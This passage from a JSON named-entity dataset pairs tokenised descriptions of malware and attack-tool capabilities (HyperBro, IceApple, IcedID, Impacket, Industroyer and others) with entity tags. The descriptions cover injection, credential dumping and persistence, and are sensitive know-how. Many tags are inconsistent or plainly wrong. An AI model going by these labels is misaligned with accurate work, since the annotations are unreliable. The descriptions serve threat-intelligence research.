"I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Hydraq", "creates", "a", "Registry", "subkey", "to", "register", "its", "created", "service,", "and", "can", "also", "uninstall", "itself", "later", "by", "deleting", "this", "value.", "Hydraq's", "backdoor", "also", "enables", "remote", "attackers", "to", "modify", "and", "delete", "subkeys." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Hydraq", "uses", "basic", "obfuscation", "in", "the", "form", "of", "spaghetti", "code." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Hydraq", "creates", "a", "backdoor", "through", "which", "remote", "attackers", "can", "monitor", "processes." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O" ] }, { "tokens": [ "Hydraq", "creates", "a", "backdoor", "through", "which", "remote", "attackers", "can", "retrieve", "system", "information,", "such", "as", "CPU", "speed,", "from", "Registry", "keys." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Hydraq", "includes", "a", "component", "based", "on", "the", "code", "of", "VNC", "that", "can", "stream", "a", "live", "feed", "of", "the", "desktop", "of", "an", "infected", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Hydraq", "uses", "svchost.exe", "to", "execute", "a", "malicious", "DLL", "included", "in", "a", "new", "service", "group." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Hydraq", "creates", "a", "backdoor", "through", "which", "remote", "attackers", "can", "load", "and", "call", "DLL", "functions." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "I-Features", "B-HackOrg", "O" ] }, { "tokens": [ "Hydraq", "C2", "traffic", "is", "encrypted", "using", "bitwise", "NOT", "and", "XOR", "operations." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Hydraq", "creates", "a", "backdoor", "through", "which", "remote", "attackers", "can", "retrieve", "information", "such", "as", "computer", "name,", "OS", "version,", "processor", "speed,", "memory", "size,", "and", "CPU", "speed." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Hydraq", "creates", "a", "backdoor", "through", "which", "remote", "attackers", "can", "retrieve", "IP", "addresses", "of", "compromised", "machines." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "Hydraq", "creates", "a", "backdoor", "through", "which", "remote", "attackers", "can", "monitor", "services." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "O" ] }, { "tokens": [ "Hydraq", "creates", "new", "services", "to", "establish", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HyperBro", "has", "used", "a", "legitimate", "application", "to", "sideload", "a", "DLL", "to", "decrypt,", "decompress,", "and", "run", "a", "payload." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "B-Features", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HyperBro", "can", "unpack", "and", "decrypt", "its", "payload", "prior", "to", "execution." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HyperBro", "can", "be", "delivered", "encrypted", "to", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HyperBro", "has", "the", "ability", "to", "delete", "a", "specified", "file." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "HyperBro", "has", "the", "ability", "to", "download", "additional", "files." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "HyperBro", "has", "the", "ability", "to", "run", "an", "application", "(<code>CreateProcessW</code>)", "or", "script/file", "(<code>ShellExecuteW</code>)", "via", "API." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HyperBro", "can", "run", "shellcode", "it", "injects", "into", "a", "newly", "created", "process." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HyperBro", "has", "the", "ability", "to", "take", "screenshots." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "B-HackOrg" ] }, { "tokens": [ "HyperBro", "has", "the", "ability", "to", "start", "and", "stop", "a", "specified", "service." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "HyperBro", "has", "the", "ability", "to", "pack", "its", "payload." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O" ] }, { "tokens": [ "HyperBro", "can", "list", "all", "services", "and", "their", "configurations." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "HyperBro", "has", "used", "HTTPS", "for", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "HyperStack", "can", "use", "default", "credentials", "to", "connect", "to", "IPC$", "shares", "on", "remote", "machines." ], "ner_tags": [ "B-SamFile", "O", "O", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HyperStack", "can", "connect", "to", "the", "IPC$", "share", "on", "remote", "machines." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HyperStack", "can", "enumerate", "all", "account", "names", "on", "a", "remote", "share." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HyperStack", "can", "add", "the", "name", "of", "its", "communication", "pipe", "to", "<code>HKLM\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\lanmanserver\\\\parameters\\NullSessionPipes</code>." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HyperStack", "can", "use", "Windows", "API's", "<code>ConnectNamedPipe</code>", "and", "<code>WNetAddConnection2</code>", "to", "detect", "incoming", "connections", "and", "connect", "to", "remote", "shares." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HyperStack", "has", "used", "RSA", "encryption", "for", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "ISMInjector", "uses", "the", "<code>certutil</code>", "command", "to", "decode", "a", "payload", "file." ], "ner_tags": [ "B-Way", "O", "O", "B-SamFile", "O", "O", "B-Purp", "O", "O", "O" ] }, { "tokens": [ "ISMInjector", "is", "obfuscated", "with", "the", "off-the-shelf", "SmartAssembly", ".NET", "obfuscator", "created", "by", "red-gate.com." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "ISMInjector", "hollows", "out", "a", "newly", "created", "process", "RegASM.exe", "and", "injects", "its", "payload", "into", "the", "hollowed", "process." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ISMInjector", "creates", "scheduled", "tasks", "to", "establish", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "IceApple", "can", "encrypt", "and", "compress", "files", "using", "Gzip", "prior", "to", "exfiltration." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "B-Features", "I-Features", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "IceApple", "can", "use", "Base64", "and", "\"junk\"", "JavaScript", "code", "to", "obfuscate", "information." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "B-Tool", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "IceApple", "can", "harvest", "credentials", "from", "local", "and", "remote", "host", "registries." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "IceApple", "can", "collect", "files,", "passwords,", "and", "other", "data", "from", "a", "compromised", "host." ], "ner_tags": [ "B-Way", "O", "I-Features", "O", "B-Features", "O", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "IceApple", "can", "use", "a", "Base64-encoded", "AES", "key", "to", "decrypt", "tasking." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "The", "IceApple", "Active", "Directory", "Querier", "module", "can", "perform", "authenticated", "requests", "against", "an", "Active", "Directory", "server." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "IceApple's", "Multi", "File", "Exfiltrator", "module", "can", "exfiltrate", "multiple", "files", "from", "a", "compromised", "host", "as", "an", "HTTP", "response", "over", "C2." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "IceApple", "can", "delete", "files", "and", "directories", "from", "targeted", "systems." ], "ner_tags": [ "B-Way", "O", "B-Features", "I-Features", "O", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "The", "IceApple", "Directory", "Lister", "module", "can", "list", "information", "about", "files", "and", "directories", "including", "creation", "time,", "last", "write", "time,", "name,", "and", "size." ], "ner_tags": [ "O", "B-SamFile", "I-SamFile", "B-SecTeam", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "IceApple", "is", "an", "IIS", "post-exploitation", "framework,", "consisting", "of", "18", "modules", "that", "provide", "several", "functionalities." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "IceApple's", "Credential", "Dumper", "module", "can", "dump", "LSA", "secrets", "from", "registry", "keys,", "including:", "`HKLM\\SECURITY\\Policy\\PolEKList\\default`,", "`HKLM\\SECURITY\\Policy\\Secrets\\*\\CurrVal`,", "and", "`HKLM\\SECURITY\\Policy\\Secrets\\*\\OldVal`." ], "ner_tags": [ "B-Idus", "O", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "IceApple", ".NET", "assemblies", "have", "used", "`App_Web_`", "in", "their", "file", "names", "to", "appear", "legitimate." ], "ner_tags": [ "B-SamFile", "B-SamFile", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "IceApple", "can", "use", "reflective", "code", "loading", "to", "load", ".NET", "assemblies", "into", "`MSExchangeOWAAppPool`", "on", "targeted", "Exchange", "servers." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "IceApple's", "Credential", "Dumper", "module", "can", "dump", "encrypted", "password", "hashes", "from", "SAM", "registry", "keys,", "including", "`HKLM\\SAM\\SAM\\Domains\\Account\\F`", "and", "`HKLM\\SAM\\SAM\\Domains\\Account\\Users\\*\\V`." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "The", "IceApple", "Result", "Retriever", "module", "can", "AES", "encrypt", "C2", "responses." ], "ner_tags": [ "O", "B-Way", "B-SecTeam", "B-SecTeam", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "IceApple", "Server", "Variable", "Dumper", "module", "iterates", "over", "all", "server", "variables", "present", "for", "the", "current", "request", "and", "returns", "them", "to", "the", "adversary." ], "ner_tags": [ "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "IceApple", "ifconfig", "module", "can", "iterate", "over", "all", "network", "interfaces", "on", "the", "host", "and", "retrieve", "the", "name,", "description,", "MAC", "address,", "DNS", "suffix,", "DNS", "servers,", "gateways,", "IPv4", "addresses,", "and", "subnet", "masks." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "IceApple", "OWA", "credential", "logger", "can", "monitor", "for", "OWA", "authentication", "requests", "and", "log", "the", "credentials." ], "ner_tags": [ "O", "B-Way", "B-Tool", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "IceApple", "can", "use", "HTTP", "GET", "to", "request", "and", "pull", "information", "from", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O" ] }, { "tokens": [ "IcedID", "has", "used", "SSL", "and", "TLS", "in", "communications", "with", "C2." ], "ner_tags": [ "B-Time", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "IcedID", "has", "used", "<code>ZwQueueApcThread</code>", "to", "inject", "itself", "into", "remote", "processes." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "B-SamFile", "B-Purp", "O", "O", "O" ] }, { "tokens": [ "IcedID", "has", "used", "web", "injection", "attacks", "to", "redirect", "victims", "to", "spoofed", "sites", "designed", "to", "harvest", "banking", "and", "other", "credentials.", "IcedID", "can", "use", "a", "self", "signed", "TLS", "certificate", "in", "connection", "with", "the", "spoofed", "site", "and", "simultaneously", "maintains", "a", "live", "connection", "with", "the", "legitimate", "site", "to", "display", "the", "correct", "URL", "and", "certificates", "in", "the", "browser." ], "ner_tags": [ "B-Idus", "O", "O", "I-OffAct", "I-OffAct", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "IcedID", "can", "query", "LDAP", "to", "identify", "additional", "users", "on", "the", "network", "to", "infect." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "IcedID", "has", "utilzed", "encrypted", "binaries", "and", "base64", "encoded", "strings." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "IcedID", "has", "the", "ability", "to", "download", "additional", "modules", "and", "a", "configuration", "file", "from", "C2." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "I-Features", "I-Features", "O", "O" ] }, { "tokens": [ "IcedID", "has", "been", "executed", "through", "Word", "documents", "with", "malicious", "embedded", "macros." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "IcedID", "can", "inject", "itself", "into", "a", "suspended", "msiexec.exe", "process", "to", "send", "beacons", "to", "C2", "while", "appearing", "as", "a", "normal", "msi", "application." ], "ner_tags": [ "B-Way", "O", "B-Way", "I-Way", "O", "O", "O", "B-SamFile", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "IcedID", "has", "called", "<code>ZwWriteVirtualMemory</code>,", "<code>ZwProtectVirtualMemory</code>,", "<code>ZwQueueApcThread</code>,", "and", "<code>NtResumeThread</code>", "to", "inject", "itself", "into", "a", "remote", "process." ], "ner_tags": [ "B-Idus", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "IcedID", "has", "the", "ability", "to", "identify", "Workgroup", "membership." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-HackOrg", "O" ] }, { "tokens": [ "IcedID", "has", "established", "persistence", "by", "creating", "a", "Registry", "run", "key." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "IcedID", "has", "created", "a", "scheduled", "task", "that", "executes", "every", "hour", "to", "establish", "persistence." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "IcedID", "has", "packed", "and", "encrypted", "its", "loader", "module." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "IcedID", "has", "been", "delivered", "via", "phishing", "e-mails", "with", "malicious", "attachments." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "IcedID", "has", "embedded", "binaries", "within", "RC4", "encrypted", ".png", "files." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "IcedID", "has", "the", "ability", "to", "identify", "the", "computer", "name", "and", "OS", "version", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "IcedID", "has", "used", "obfuscated", "VBA", "string", "expressions." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "IcedID", "has", "used", "HTTPS", "in", "communications", "with", "C2." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "IcedID", "has", "used", "WMI", "to", "execute", "binaries." ], "ner_tags": [ "B-Time", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Imminent", "Monitor", "has", "a", "remote", "microphone", "monitoring", "capability." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Imminent", "Monitor", "has", "a", "CommandPromptPacket", "and", "ScriptPacket", "module(s)", "for", "creating", "a", "remote", "shell", "and", "executing", "scripts." ], "ner_tags": [ "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Imminent", "Monitor", "has", "a", "PasswordRecoveryPacket", "module", "for", "recovering", "browser", "passwords." ], "ner_tags": [ "B-SamFile", "B-Tool", "O", "O", "B-SamFile", "O", "O", "I-Features", "I-Features", "B-HackOrg" ] }, { "tokens": [ "Imminent", "Monitor", "has", "decoded", "malware", "components", "that", "are", "then", "dropped", "to", "the", "system." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Imminent", "Monitor", "has", "a", "feature", "to", "disable", "Windows", "Task", "Manager." ], "ner_tags": [ "B-SamFile", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Imminent", "Monitor", "has", "uploaded", "a", "file", "containing", "debugger", "logs,", "network", "information", "and", "system", "information", "to", "the", "C2." ], "ner_tags": [ "B-Time", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Imminent", "Monitor", "has", "deleted", "files", "related", "to", "its", "dynamic", "debugger", "feature." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O" ] }, { "tokens": [ "Imminent", "Monitor", "has", "a", "dynamic", "debugging", "feature", "to", "check", "whether", "it", "is", "located", "in", "the", "%TEMP%", "directory,", "otherwise", "it", "copies", "itself", "there." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Imminent", "Monitor", "has", "a", "dynamic", "debugging", "feature", "to", "set", "the", "file", "attribute", "to", "hidden." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Imminent", "Monitor", "has", "a", "keylogging", "module." ], "ner_tags": [ "B-SamFile", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Imminent", "Monitor", "has", "leveraged", "CreateProcessW()", "call", "to", "execute", "the", "debugger." ], "ner_tags": [ "B-Time", "B-SecTeam", "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Imminent", "Monitor", "has", "encrypted", "the", "spearphish", "attachments", "to", "avoid", "detection", "from", "email", "gateways;", "the", "debugger", "also", "encrypts", "information", "before", "sending", "to", "the", "C2." ], "ner_tags": [ "B-Time", "B-SecTeam", "O", "O", "O", "B-Way", "B-SecTeam", "O", "O", "O", "O", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Imminent", "Monitor", "has", "a", "\"Process", "Watcher\"", "feature", "to", "monitor", "processes", "in", "case", "the", "client", "ever", "crashes", "or", "gets", "closed." ], "ner_tags": [ "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Imminent", "Monitor", "has", "a", "module", "for", "performing", "remote", "desktop", "access." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Imminent", "Monitor", "has", "the", "capability", "to", "run", "a", "cryptocurrency", "miner", "on", "the", "victim", "machine." ], "ner_tags": [ "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Imminent", "Monitor", "has", "a", "remote", "webcam", "monitoring", "capability." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Impacket", "modules", "like", "GetUserSPNs", "can", "be", "used", "to", "get", "Service", "Principal", "Names", "(SPNs)", "for", "user", "accounts.", "The", "output", "is", "formatted", "to", "be", "compatible", "with", "cracking", "tools", "like", "John", "the", "Ripper", "and", "Hashcat." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "B-Way", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Impacket", "modules", "like", "ntlmrelayx", "and", "smbrelayx", "can", "be", "used", "in", "conjunction", "with", "Network", "Sniffing", "and", "LLMNR/NBT-NS", "Poisoning", "and", "SMB", "Relay", "to", "gather", "NetNTLM", "credentials", "for", "Brute", "Force", "or", "relay", "attacks", "that", "can", "gain", "code", "execution." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "I-Way", "B-SecTeam", "O", "B-Way", "B-Tool", "O", "B-Way", "B-Tool", "O", "B-Purp", "B-Way", "B-Features", "O", "B-Idus", "B-HackOrg", "O", "I-OffAct", "I-OffAct", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SecretsDump", "and", "Mimikatz", "modules", "within", "Impacket", "can", "perform", "credential", "dumping", "to", "obtain", "account", "and", "password", "information." ], "ner_tags": [ "B-Way", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "B-Features" ] }, { "tokens": [ "SecretsDump", "and", "Mimikatz", "modules", "within", "Impacket", "can", "perform", "credential", "dumping", "to", "obtain", "account", "and", "password", "information." ], "ner_tags": [ "B-Way", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "B-Features" ] }, { "tokens": [ "SecretsDump", "and", "Mimikatz", "modules", "within", "Impacket", "can", "perform", "credential", "dumping", "to", "obtain", "account", "and", "password", "information", "from", "NTDS.dit." ], "ner_tags": [ "B-Way", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Impacket", "can", "be", "used", "to", "sniff", "network", "traffic", "via", "an", "interface", "or", "raw", "socket." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SecretsDump", "and", "Mimikatz", "modules", "within", "Impacket", "can", "perform", "credential", "dumping", "to", "obtain", "account", "and", "password", "information." ], "ner_tags": [ "B-Way", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "B-Features" ] }, { "tokens": [ "Impacket", "contains", "various", "modules", "emulating", "other", "service", "execution", "tools", "such", "as", "PsExec." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Impacket's", "wmiexec", "module", "can", "be", "used", "to", "execute", "commands", "through", "WMI." ], "ner_tags": [ "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "B-Way" ] }, { "tokens": [ "Industroyer", "uses", "a", "custom", "DoS", "tool", "that", "leverages", "CVE-2015-5374", "and", "targets", "hardcoded", "IP", "addresses", "of", "Siemens", "SIPROTEC", "devices." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Industroyer", "has", "used", "a", "Trojanized", "version", "of", "the", "Windows", "Notepad", "application", "for", "an", "additional", "backdoor", "persistence", "mechanism." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Industroyer’s", "data", "wiper", "module", "clears", "registry", "keys", "and", "overwrites", "both", "ICS", "configuration", "and", "Windows", "files." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "Industroyer", "decrypts", "code", "to", "connect", "to", "a", "remote", "C2", "server." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Industroyer", "sends", "information", "about", "hardware", "profiles", "and", "previously-received", "commands", "back", "to", "the", "C2", "server", "in", "a", "POST-request." ], "ner_tags": [ "B-Idus", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Industroyer’s", "data", "wiper", "component", "enumerates", "specific", "files", "on", "all", "the", "Windows", "drives." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Industroyer", "downloads", "a", "shellcode", "payload", "from", "a", "remote", "C2", "server", "and", "loads", "it", "into", "memory." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Industroyer", "used", "Tor", "nodes", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "I-Tool", "I-Tool", "O", "O" ] }, { "tokens": [ "Industroyer", "uses", "a", "custom", "port", "scanner", "to", "map", "out", "a", "network." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Industroyer", "uses", "heavily", "obfuscated", "code", "in", "its", "Windows", "Notepad", "backdoor." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Industroyer", "attempts", "to", "perform", "an", "HTTP", "CONNECT", "via", "an", "internal", "proxy", "to", "establish", "a", "tunnel." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Industroyer", "has", "a", "data", "wiper", "component", "that", "enumerates", "keys", "in", "the", "Registry", "<code>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services</code>." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Industroyer", "can", "enumerate", "remote", "computers", "in", "the", "compromised", "network." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Industroyer’s", "data", "wiper", "module", "writes", "zeros", "into", "the", "registry", "keys", "in", 